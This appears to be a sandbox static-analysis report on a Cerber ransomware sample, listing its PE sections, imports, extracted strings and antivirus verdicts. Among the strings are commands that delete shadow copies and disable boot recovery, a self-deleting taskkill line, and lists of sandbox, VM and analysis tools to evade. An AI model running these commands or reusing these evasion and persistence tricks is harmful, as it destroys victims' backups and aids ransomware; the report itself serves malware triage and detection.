Static | ZeroBOX

PE Compile Time

2016-06-08 20:27:54

PE Imphash

ae80b4ecb14ba8e602aaba0e2180c87d

Sections

Name     Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text    0x00001000       0x0000fe34    0x00010000        6.58406476061
.rdata   0x00011000       0x00003a34    0x00003c00        5.46267521575
.data    0x00015000       0x00002860    0x00000c00        4.27479069683
.rsrc    0x00018000       0x00007804    0x00007a00        7.98791491626

Resources

Name       Offset      Size        Language      Sub-language     File type
RT_RCDATA  0x00018058  0x000077aa  LANG_NEUTRAL  SUBLANG_NEUTRAL  data

Imports

Library CRYPT32.dll:
0x93107c CryptDecodeObjectEx
Library WININET.dll:
0x9313c8 InternetCloseHandle
0x9313cc InternetConnectA
0x9313d0 HttpOpenRequestA
0x9313d4 InternetReadFile
0x9313d8 InternetCrackUrlA
0x9313dc InternetOpenA
0x9313e0 HttpSendRequestA
Library SHLWAPI.dll:
0x931308 StrCmpNIA
0x93130c StrToIntA
0x931310 StrChrA
0x931314 StrToInt64ExA
0x931318 StrSpnA
0x93131c PathFindFileNameW
0x931320 StrStrIA
0x931324 StrCmpNW
0x931328 StrChrIA
0x93132c StrCpyNW
0x931330 PathMatchSpecW
0x931334 StrCmpNIW
0x931338 StrPBrkA
0x93133c PathCombineW
0x931340 PathSkipRootW
0x931344 StrStrIW
0x931348 PathUnquoteSpacesW
0x93134c StrChrW
Library VERSION.dll:
0x9313ac VerQueryValueW
0x9313b0 GetFileVersionInfoW
0x9313b8 VerQueryValueA
0x9313c0 GetFileVersionInfoA
Library MPR.dll:
0x9312c4 WNetOpenEnumW
0x9312c8 WNetCloseEnum
0x9312cc WNetEnumResourceW
Library imagehlp.dll:
0x931414 CheckSumMappedFile
Library WS2_32.dll:
0x9313e8 htons
0x9313ec sendto
0x9313f0 socket
0x9313f4 WSAStartup
0x9313f8 inet_ntoa
0x9313fc inet_addr
0x931400 htonl
0x931404 shutdown
0x931408 closesocket
0x93140c gethostbyname
Library KERNEL32.dll:
0x9310c0 WaitForSingleObject
0x9310c4 SetEvent
0x9310c8 OutputDebugStringW
0x9310cc SetFileTime
0x9310d0 WriteFile
0x9310d8 Sleep
0x9310e0 GetTimeFormatW
0x9310e4 GetFileAttributesW
0x9310ec ReadFile
0x9310f0 GetFileSizeEx
0x9310f4 MoveFileW
0x9310fc CreateEventW
0x931100 SizeofResource
0x931104 GetFileTime
0x93110c CloseHandle
0x931114 lstrcpyW
0x931118 CreateThread
0x93111c LoadResource
0x931120 FindResourceW
0x931124 FreeResource
0x931128 LocalFree
0x93112c ExitProcess
0x931130 lstrcpynA
0x931134 MultiByteToWideChar
0x931138 GetTempFileNameW
0x93113c GetFileSize
0x931140 MapViewOfFile
0x931144 UnmapViewOfFile
0x931148 FreeLibrary
0x93114c CreateProcessW
0x931150 LoadLibraryExW
0x931154 LoadLibraryW
0x931158 CopyFileW
0x93115c ReadProcessMemory
0x931164 lstrcpynW
0x931168 TerminateProcess
0x931170 SetFilePointerEx
0x931174 GetTempPathW
0x931178 VirtualAllocEx
0x93117c CreateFileMappingW
0x931180 OpenEventW
0x931184 WinExec
0x93118c DeleteFileW
0x931190 WriteProcessMemory
0x931194 ResumeThread
0x931198 FindFirstFileW
0x93119c GetModuleFileNameW
0x9311a0 FindClose
0x9311a4 SetFileAttributesW
0x9311a8 WideCharToMultiByte
0x9311ac CreateMutexW
0x9311b0 GetCurrentProcess
0x9311b4 GetCurrentThreadId
0x9311b8 SetFilePointer
0x9311bc SetThreadPriority
0x9311c8 OutputDebugStringA
0x9311d0 GetFileAttributesA
0x9311d4 lstrlenA
0x9311d8 SearchPathW
0x9311dc lstrcpyA
0x9311e4 IsBadWritePtr
0x9311e8 TlsAlloc
0x9311ec GetVersionExW
0x9311f0 lstrcmpiA
0x9311f4 GetTickCount
0x9311f8 GetModuleFileNameA
0x9311fc GetDateFormatW
0x931200 GetProcAddress
0x931204 lstrlenW
0x931208 lstrcatW
0x93120c MulDiv
0x931210 GetSystemDirectoryW
0x931218 LockResource
0x93121c SetErrorMode
0x931224 GetModuleHandleW
0x93122c GetLastError
0x931230 OpenMutexW
0x931234 VirtualProtect
0x931238 GetNativeSystemInfo
0x93123c GetDriveTypeW
0x931240 GetLogicalDrives
0x931244 VirtualFree
0x931248 VirtualAlloc
0x93124c GetModuleHandleA
0x931250 QueryDosDeviceW
0x931254 FindNextFileW
0x931258 HeapReAlloc
0x93125c HeapAlloc
0x931260 HeapFree
0x931264 HeapCreate
0x931268 HeapValidate
0x93126c SetLastError
0x931270 GetProcessHeaps
0x931274 HeapSetInformation
0x931278 GetCurrentProcessId
0x93127c GetComputerNameA
0x931280 lstrcmpiW
0x931288 CreateDirectoryW
0x93128c Process32NextW
0x931290 GetSystemInfo
0x931294 OpenProcess
0x931298 GetCurrentThread
0x93129c IsBadStringPtrA
0x9312a4 IsBadCodePtr
0x9312a8 IsBadStringPtrW
0x9312ac RtlUnwind
0x9312b0 CreateFileW
0x9312b4 FlushFileBuffers
0x9312b8 Process32FirstW
0x9312bc IsBadReadPtr
Library ADVAPI32.dll:
0x931000 RegOpenKeyExW
0x931004 RegCloseKey
0x931014 CreateWellKnownSid
0x93101c FreeSid
0x931024 DuplicateToken
0x931028 GetTokenInformation
0x93102c OpenProcessToken
0x931034 GetLengthSid
0x931038 RegSetValueExW
0x93103c RegFlushKey
0x931040 RegOpenKeyW
0x931048 RegCreateKeyExW
0x93104c RegEnumValueW
0x931050 RegEnumKeyW
0x931054 CryptDestroyKey
0x93105c CryptGetKeyParam
0x931060 RegDeleteValueW
0x931064 CryptEncrypt
0x931068 RegQueryValueExW
Library USER32.dll:
0x931354 wsprintfW
0x931358 DispatchMessageW
0x93135c DefWindowProcW
0x931360 RegisterClassW
0x931364 CreateWindowExW
0x931368 PeekMessageW
0x93136c TranslateMessage
0x931370 wsprintfA
0x931374 CharLowerBuffA
0x931378 GetSystemMetrics
0x931380 ReleaseDC
0x931388 GetDC
0x93138c DrawTextA
0x931390 FillRect
0x931394 GetLastInputInfo
0x931398 RegisterClassExW
0x93139c UnregisterClassW
0x9313a0 GetForegroundWindow
Library ole32.dll:
0x931468 CoCreateInstance
0x931470 CoInitialize
0x931474 CoInitializeEx
0x931478 CoUninitialize
Library SHELL32.dll:
0x9312f0 ShellExecuteW
0x9312f4 ShellExecuteExW
0x9312f8 SHGetFolderPathW
0x9312fc SHChangeNotify
Library ntdll.dll:
0x93141c ZwOpenSection
0x931424 NtDeleteFile
0x931428 isspace
0x931430 memmove
0x931434 ZwOpenProcess
0x931438 ZwClose
0x931444 _chkstk
0x93144c _allmul
0x931450 memcpy
0x931454 _alldiv
0x931458 memset
0x93145c _aulldvrm
Library OLEAUT32.dll:
0x9312e4 SysAllocString
0x9312e8 SysFreeString
Library GDI32.dll:
0x931084 SetTextColor
0x931088 DeleteDC
0x93108c GetDeviceCaps
0x931090 GetDIBits
0x931094 SetBkColor
0x931098 SetPixel
0x93109c DeleteObject
0x9310a0 SelectObject
0x9310a4 CreateCompatibleDC
0x9310ac CreateFontW
0x9310b0 GetObjectW
0x9310b4 GetStockObject
Library NETAPI32.dll:
0x9312d4 NetUserEnum
0x9312d8 NetUserGetInfo
0x9312dc NetApiBufferFree

!This program cannot be run in DOS mode.
Fcerber
wine_get_unix_file_name
close_process
encrypt
multithread
max_block_size
max_blocks
min_file_size
rsa_key_size
global_public_key
autoElevate
requestedExecutionLevel
requireAdministrator
SHCreateItemFromParsingName
Stop reason: %s
%02x%02x%02x%02x%02x%02x%05xcerber
%02X%02X%02X%02X%02X%02X%05X%03X
%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c
data len: %d, trash len: %d, overlay: %s
default
site_%d
servers
statistics
timeout
%[^/]%[/]%d
Sending stat %s, %s
data_start
data_finish
{IS_ADMIN}
{IS_X64}
{COUNTRY}
{PARTNER_ID}
{PC_ID}
{STOP_REASON}
{MD5_KEY}
%02X%02X%02X%02X%02X%02X
{COUNT_FILES}
{SITE_
av_blacklist
kernel32.dll
blacklist
languages
ip_geo
property_name
countries
network
vmware
country
language
activity
send_stat
wallpaper
background
help_files
files_name
file_extension
file_body
new_extension
folders
whitelist
IsWow64Process
kernel32
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Wow64DisableWow64FsRedirection
0123456789abcdef
"= '()\/
+-0123456789.Ee
CryptDecodeObjectEx
CryptImportPublicKeyInfo
CRYPT32.dll
InternetConnectA
InternetCrackUrlA
InternetReadFile
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
StrStrIW
StrCmpNIW
StrCpyNW
StrChrIA
StrStrIA
PathFindFileNameW
StrSpnA
StrCmpNIA
PathRemoveExtensionW
StrToIntA
StrChrA
StrChrW
StrCmpNW
PathMatchSpecW
SHLWAPI.dll
GetFileVersionInfoSizeW
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VERSION.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
CheckSumMappedFile
imagehlp.dll
WS2_32.dll
FreeResource
FindResourceW
LoadResource
SizeofResource
LockResource
SetErrorMode
GetSystemWindowsDirectoryW
GetModuleHandleW
CreateFileW
OpenMutexW
GetLastError
GetVolumeInformationW
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
wsprintfW
GetSystemDirectoryW
lstrcatW
lstrlenW
GetProcAddress
GetDateFormatW
SetFilePointer
SetFilePointerEx
WaitForSingleObject
SetEvent
OutputDebugStringW
SetFileTime
WriteFile
InitializeCriticalSection
LeaveCriticalSection
GetTimeFormatW
GetFileAttributesW
FileTimeToSystemTime
ReadFile
GetFileSizeEx
MoveFileW
EnterCriticalSection
CreateEventW
CryptDestroyKey
GetFileTime
DeleteCriticalSection
CloseHandle
FileTimeToLocalFileTime
lstrcpyW
CreateThread
CryptAcquireContextW
CryptGetKeyParam
CryptEncrypt
LocalFree
ExitProcess
CoUninitialize
ShellExecuteExW
GetForegroundWindow
CoInitializeEx
GetTempFileNameW
GetFileSize
CoCreateInstance
MapViewOfFile
UnmapViewOfFile
FreeLibrary
CreateProcessW
LoadLibraryExW
LoadLibraryW
CopyFileW
ReadProcessMemory
GetSystemWow64DirectoryW
lstrcpynW
TerminateProcess
FlushInstructionCache
FlushFileBuffers
GetTempPathW
VirtualAllocEx
CreateFileMappingW
ZwQueryInformationProcess
OpenEventW
WinExec
GetWindowsDirectoryW
DeleteFileW
WriteProcessMemory
ResumeThread
FindFirstFileW
GetModuleFileNameW
FindClose
SetFileAttributesW
DispatchMessageW
DefWindowProcW
CreateMutexW
RegisterClassW
GetCurrentProcess
CreateWindowExW
GetCurrentThread
PeekMessageW
TranslateMessage
SetThreadPriority
SHGetFolderPathW
wsprintfA
SetCurrentDirectoryW
OutputDebugStringA
SetProcessShutdownParameters
CoInitializeSecurity
CharLowerBuffA
lstrlenA
GetSystemMetrics
lstrcpyA
GetEnvironmentVariableW
GetKeyboardLayoutList
RegCreateKeyExW
SHChangeNotify
GetVersionExW
lstrcmpiA
GetTickCount
RegOpenKeyW
GetModuleFileNameA
GetStockObject
GetObjectW
CreateFontW
ReleaseDC
SystemParametersInfoW
CreateCompatibleBitmap
MulDiv
CreateCompatibleDC
SelectObject
DeleteObject
SetPixel
SetBkColor
GetDIBits
GetDeviceCaps
DeleteDC
SetTextColor
DrawTextA
FillRect
GetNativeSystemInfo
GetDriveTypeW
GetLogicalDrives
VirtualFree
VirtualAlloc
ShellExecuteW
QueryDosDeviceW
FindNextFileW
RegSetValueExW
KERNEL32.dll
HeapReAlloc
HeapAlloc
HeapFree
HeapCreate
HeapValidate
SetLastError
GetProcessHeaps
HeapSetInformation
GetCurrentProcessId
GetComputerNameA
OpenProcessToken
GetTokenInformation
GetLastInputInfo
ZwQuerySystemInformation
OpenProcess
ZwOpenDirectoryObject
LookupPrivilegeValueW
ZwClose
GetHandleInformation
SetKernelObjectSecurity
Process32FirstW
ZwOpenProcess
ConvertStringSecurityDescriptorToSecurityDescriptorW
GetSystemInfo
Process32NextW
lstrcmpiW
GetModuleHandleA
VirtualProtect
CreateToolhelp32Snapshot
AdjustTokenPrivileges
ZwOpenSection
ADVAPI32.dll
USER32.dll
SearchPathW
GetFileAttributesA
RtlFreeUnicodeString
NtDeleteFile
RtlDosPathNameToNtPathName_U
memmove
WideCharToMultiByte
MultiByteToWideChar
lstrcpynA
ole32.dll
SHELL32.dll
IsBadWritePtr
TlsAlloc
ntdll.dll
NetUserGetInfo
NetApiBufferFree
NetUserEnum
GetLengthSid
ConvertSidToStringSidW
ExpandEnvironmentStringsW
CreateDirectoryW
DuplicateToken
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
CreateWellKnownSid
RegisterClassExW
UnregisterClassW
OLEAUT32.dll
GDI32.dll
IsBadStringPtrW
IsBadReadPtr
IsBadCodePtr
IsBadStringPtrA
GetCurrentThreadId
WaitForMultipleObjects
isspace
NETAPI32.dll
CoInitialize
RegDeleteValueW
RegEnumValueW
RegFlushKey
CryptStringToBinaryA
CryptBinaryToStringA
StrPBrkA
PathCombineW
PathUnquoteSpacesW
PathSkipRootW
StrToInt64ExA
GetFileVersionInfoW
VerQueryValueW
memset
_aulldvrm
memcpy
_allmul
_chkstk
_alldiv
RtlUnwind
NtQueryVirtualMemory
sbiedll.dll
dir_watch.dll
api_log.dll
test_item.exe
dbghelp.dll
Frz_State
C:\popupkiller.exe
C:\stimulator.exe
C:\TOOLS\execute.exe
\sand-box\
\cwsandbox\
\sandbox\
\\.\NPF_NdisWanIp
\\.\cv2k1
wireshark.exe
dumpcap.exe
ollydbg.exe
idag.exe
sysanalyzer.exe
sniff_hit.exe
scktool.exe
proc_analyzer.exe
hookexplorer.exe
multi_pot.exe
VEN_%x
SYSTEM\CurrentControlSet\Enum\PCI
SystemBiosVersion
HARDWARE\Description\System
PARALLELS
VideoBiosVersion
Identifier
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
VIRTUALBOX
SOFTWARE\Oracle\VirtualBox Guest Additions
\drivers\
VBoxMouse.sys
VMWARE
WMWARE
SOFTWARE\VMware, Inc.\VMware Tools
vmmouse.sys
vmhgfs.sys
ekernel32.dll
%s\%s%S
Encrypting file %s...
Modified at %s %s
files.txt
Component_00
Component_01
/d /c start "" "%s"
%COMSPEC%
"%s\explorer.exe"
eshell32.dll
netstat
ftp.exe
attrib
lookup
winlogon
msiexec
logoff
notepad
winmine
telnet
ntbackup
mshearts
freecell
cmd.exe
spider
sol.exe
install
update
\x*x.exe
CERBER_CORE_PROTECTION_MUTEX
shell.%s
CERBER_EVALUATED_CORE_PROTECTION_EVENT
"%s\%s"
CERBER_BODY_PLACE
SeDebugPrivilege
sComponent_02
ProgramFilesDir (x86)
SOFTWARE\Microsoft\Windows\CurrentVersion
ProgramFilesDir
C:\test\cerber_debug.txt
Installed
COMSPEC
/d /c taskkill /t /f /im "%s" > NUL & ping -n 1 127.0.0.1 > NUL & del "%s" > NUL
%s\vssadmin.exe
delete shadows /all /quiet
%s\wbem\wmic.exe
shadowcopy delete
/set {default} recoveryenabled no
bcdedit.exe
/set {default} bootstatuspolicy ignoreallfailures
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA
Consolas
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
CERBER_KEY_PLACE
Printers\Defaults\%s
api-ms-win-
\KnownDlls32
\KnownDlls
\VarFileInfo\Translation
FileDescription
\StringFileInfo\%04x%04x\%s
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
0123456789
~!@#$%^&*+=
[]{}()<>
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
ProfileImagePath
%s\*.lnk
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Command Processor
AutoRun
Control Panel\Desktop
SCRNSAVE.EXE
.DEFAULT
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Zerber.tn5z
tehtris Generic.Malware
ClamAV Win.Ransomware.Imps-7086557-0
CMC Clean
CAT-QuickHeal Trojan.Mauvaise.SL1
ALYac Trojan.EmotetU.Gen.hqW@beX9Vkk
Cylance unsafe
Zillya Trojan.Zerber.Win32.217
Paloalto Clean
Sangfor Ransom.Win32.Save.a
K7AntiVirus Trojan ( 004e189a1 )
Alibaba Malware:Win32/km_247cf.None
K7GW Trojan ( 004e189a1 )
Cybereason malicious.5e7f95
Baidu Clean
VirIT Clean
Cyren W32/ABRansom.GOAU-7212
Symantec Trojan.Ransomlock.AH
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.FSTFDUU
APEX Malicious
Avast Win32:Ransom-AYU [Trj]
Cynet Malicious (score: 100)
Kaspersky Trojan-Ransom.Win32.Zerber.eck
BitDefender Trojan.EmotetU.Gen.hqW@beX9Vkk
NANO-Antivirus Trojan.Win32.Encoder.fdpixl
ViRobot Clean
MicroWorld-eScan Trojan.EmotetU.Gen.hqW@beX9Vkk
Tencent Malware.Win32.Gencirc.115a4691
TACHYON Ransom/W32.Cerber.116224.B
Sophos Mal/Generic-S
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.Encoder.4691
VIPRE Trojan.EmotetU.Gen.hqW@beX9Vkk
TrendMicro Ransom_HPCERBER.SM7
McAfee-GW-Edition BehavesLike.Win32.Generic.cc
Trapmine malicious.high.ml.score
FireEye Generic.mg.88e6a85ea94ea57f
Emsisoft Trojan.EmotetU.Gen.hqW@beX9Vkk (B)
SentinelOne Static AI - Malicious PE
GData Trojan.EmotetU.Gen.hqW@beX9Vkk
Jiangmin Trojan.Zerber.ie
Webroot Clean
Avira TR/Dropper.Gen
Antiy-AVL Trojan/Win32.SGeneric
Kingsoft malware.kb.a.1000
Gridinsoft Ransom.Win32.Blocker.oa!s1
Xcitium Backdoor.Win32.Androm.GHE@5sc2x6
Arcabit Trojan.EmotetU.Gen.E70EDA
SUPERAntiSpyware Clean
ZoneAlarm Trojan-Ransom.Win32.Zerber.eck
Microsoft Ransom:Win32/Cerber.A
Google Detected
AhnLab-V3 Trojan/Win32.Cerber.R186114
Acronis Clean
McAfee GenericR-HXD!88E6A85EA94E
MAX malware (ai score=80)
VBA32 Clean
Malwarebytes Malware.AI.1299712879
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall Ransom_HPCERBER.SM7
Rising Ransom.Cerber!1.E6AA (CLASSIC)
Yandex Trojan.GenAsa!R5BSmhzb6WQ
Ikarus Trojan-Ransom.Blocker
MaxSecure Trojan.Malware.9545736.susgen
Fortinet W32/Ransom_HPCERBER.FSTFDUU!tr
BitDefenderTheta AI:Packer.666079391E
AVG Win32:Ransom-AYU [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.